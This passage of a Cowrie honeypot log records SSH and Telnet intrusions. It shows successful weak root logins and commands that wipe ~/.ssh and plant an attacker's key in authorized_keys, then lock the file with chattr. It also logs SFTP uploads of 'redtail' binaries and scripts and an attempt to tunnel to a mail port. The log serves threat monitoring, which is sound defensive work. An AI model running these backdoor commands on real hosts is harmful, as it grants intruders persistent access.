AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.805168Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.850786Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.894369Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.896329Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.898990Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.901264Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.903724Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.904771Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:09.949016Z","src_ip":"212.227.125.160","session":"443828a65d1f"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":50634,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bde7305bf31","protocol":"ssh","message":"New connection: 93.123.109.181:50634 (1.2.3.4:22) [session: 9bde7305bf31]","sensor":"my-vps","timestamp":"2025-08-26T02:04:43.628398Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:43.652517Z","src_ip":"93.123.109.181","session":"9bde7305bf31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34386,"dst_ip":"1.2.3.4","dst_port":22,"session":"6144eadb938b","protocol":"ssh","message":"New connection: 212.227.235.229:34386 (1.2.3.4:22) [session: 6144eadb938b]","sensor":"my-vps","timestamp":"2025-08-26T02:04:53.991212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:04:53.992183Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:04:54.249208Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.login.success","username":"root","password":"root2025","message":"login attempt [root/root2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:04:55.321223Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:04:55.918536Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:04:55.919373Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:04:55.920494Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:56.178936Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:04:56.713608Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:04:56.714414Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:04:56.974440Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:56.975684Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55164,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42a8871e66d","protocol":"ssh","message":"New connection: 212.227.235.229:55164 (1.2.3.4:22) [session: e42a8871e66d]","sensor":"my-vps","timestamp":"2025-08-26T02:04:57.254910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:04:57.255691Z","src_ip":"212.227.235.229","session":"e42a8871e66d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:04:57.537058Z","src_ip":"212.227.235.229","session":"e42a8871e66d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:04:58.703610Z","src_ip":"212.227.235.229","session":"e42a8871e66d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:04:59.987854Z","src_ip":"212.227.235.229","session":"e42a8871e66d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55176,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f69795bb94e","protocol":"ssh","message":"New connection: 212.227.235.229:55176 (1.2.3.4:22) [session: 9f69795bb94e]","sensor":"my-vps","timestamp":"2025-08-26T02:05:00.266890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:05:00.267852Z","src_ip":"212.227.235.229","session":"9f69795bb94e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:05:00.549317Z","src_ip":"212.227.235.229","session":"9f69795bb94e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:05:01.710639Z","src_ip":"212.227.235.229","session":"9f69795bb94e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:05:01.992835Z","src_ip":"212.227.235.229","session":"6144eadb938b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:05:01.994369Z","src_ip":"212.227.235.229","session":"9f69795bb94e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56032,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea52c0ebd674","protocol":"telnet","message":"New connection: 212.227.125.160:56032 (1.2.3.4:23) [session: ea52c0ebd674]","sensor":"my-vps","timestamp":"2025-08-26T02:05:30.556766Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:05:41.864992Z","src_ip":"212.227.235.229","session":"6aa55b3291e7"}
{"eventid":"cowrie.session.closed","duration":180.42719554901123,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:05:41.868944Z","src_ip":"212.227.235.229","session":"6aa55b3291e7"}
{"eventid":"cowrie.session.connect","src_ip":"36.227.194.152","src_port":43200,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e0b1afe725a","protocol":"telnet","message":"New connection: 36.227.194.152:43200 (1.2.3.4:23) [session: 7e0b1afe725a]","sensor":"my-vps","timestamp":"2025-08-26T02:05:46.088759Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43630,"dst_ip":"1.2.3.4","dst_port":22,"session":"d31ffc728520","protocol":"ssh","message":"New connection: 212.227.235.229:43630 (1.2.3.4:22) [session: d31ffc728520]","sensor":"my-vps","timestamp":"2025-08-26T02:06:10.226123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T02:06:10.227331Z","src_ip":"212.227.235.229","session":"d31ffc728520"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T02:06:10.355710Z","src_ip":"212.227.235.229","session":"d31ffc728520"}
{"eventid":"cowrie.login.success","username":"root","password":"gay","message":"login attempt [root/gay] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:06:10.954790Z","src_ip":"212.227.235.229","session":"d31ffc728520"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T02:06:11.085617Z","session":"d31ffc728520"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T02:06:11.213675Z","src_ip":"212.227.235.229","session":"d31ffc728520"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:11.342879Z","src_ip":"212.227.235.229","session":"d31ffc728520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35428,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4823710c3f7","protocol":"ssh","message":"New connection: 212.227.235.229:35428 (1.2.3.4:22) [session: a4823710c3f7]","sensor":"my-vps","timestamp":"2025-08-26T02:06:12.259919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:06:12.260644Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:06:12.522934Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Ni1234567","message":"login attempt [root/Ni1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:06:13.607205Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.session.closed","duration":43.560138463974,"message":"Connection lost after 43 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:14.116836Z","src_ip":"212.227.125.160","session":"ea52c0ebd674"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:06:14.186348Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:06:14.187134Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:06:14.188195Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:14.448177Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:06:14.985790Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:06:14.986475Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
